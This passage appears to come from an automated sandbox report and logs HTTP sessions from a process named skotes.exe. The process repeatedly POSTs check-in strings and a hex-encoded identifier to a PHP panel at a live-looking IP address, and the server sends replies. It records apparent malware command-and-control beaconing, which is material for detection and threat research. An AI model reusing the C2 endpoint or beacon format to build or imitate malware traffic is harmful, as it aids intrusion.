                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:07.428366899 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:23:07 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          56192.168.2.450129185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:09.180354118 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:10.510766029 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:23:10 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          57192.168.2.450132185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:12.149961948 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:13.517118931 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:23:13 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          58192.168.2.450135185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:15.259111881 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:16.608469009 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:23:16 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          59192.168.2.450137185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:18.243520975 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:19.649151087 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:23:19 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          60192.168.2.450138185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:21.399168968 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:22.730588913 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:23:22 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          61192.168.2.450139185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:24.397455931 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:25.743654966 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:23:25 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          62192.168.2.450140185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:27.495104074 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:28.826093912 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:23:28 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          63192.168.2.450141185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:30.567833900 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:31.966953993 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:23:31 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          64192.168.2.450142185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:33.714731932 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:35.044661999 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:23:34 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          65192.168.2.450143185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:36.686003923 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:38.023305893 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:23:37 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          66192.168.2.450144185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:39.775156021 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:41.159094095 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:23:40 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          67192.168.2.450145185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:42.789693117 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:44.144654989 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:23:43 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          68192.168.2.450146185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:46.094542027 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:47.351914883 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:23:47 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          69192.168.2.450147185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:48.979979038 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:50.317516088 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:23:50 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          70192.168.2.450148185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:52.071645021 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:53.402457952 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:23:53 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          71192.168.2.450149185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:55.039880991 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:23:56.389278889 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:23:56 GMT
